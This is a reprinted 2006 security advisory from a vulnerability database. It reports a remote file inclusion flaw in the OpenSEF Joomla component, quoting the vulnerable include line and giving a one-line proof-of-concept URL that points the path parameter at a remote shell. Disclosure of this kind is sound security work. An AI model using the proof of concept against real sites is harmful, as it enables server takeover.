Modification For OpenSEF Remote file Inclusion

2006-08-21T00:00:00
ID SECURITYVULNS:DOC:13972
Type securityvulns
Reporter Securityvulns
Modified 2006-08-21T00:00:00

Description

            ###########################################################################################
            #                       Aria-Security.net Advisory                                        #
            #                       Discovered  by: O.U.T.L.A.W                                       #                     #                       < www.Aria-security.net >                                         #
            #               Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                              #
            #                                                                                         #
            ###########################################################################################

Software: OpenSEF

Attack method: Remote File Inclusion

Description : OpenSEF is a Joomla component that extends the built-in SEF (Search Engine Friendly)

Source:

require_once( $mosConfig_absolute_path . '/includes/sef.php' ); } else { // Joomla!'s SEF option is turned off; revert to Joomla!'s original-style //


Proof of Concept:

http://www.site.com/sef.php?mosConfig_absolute_path=SHELL

----------------------------------------------------------

Contact : Outlaw@aria-security.net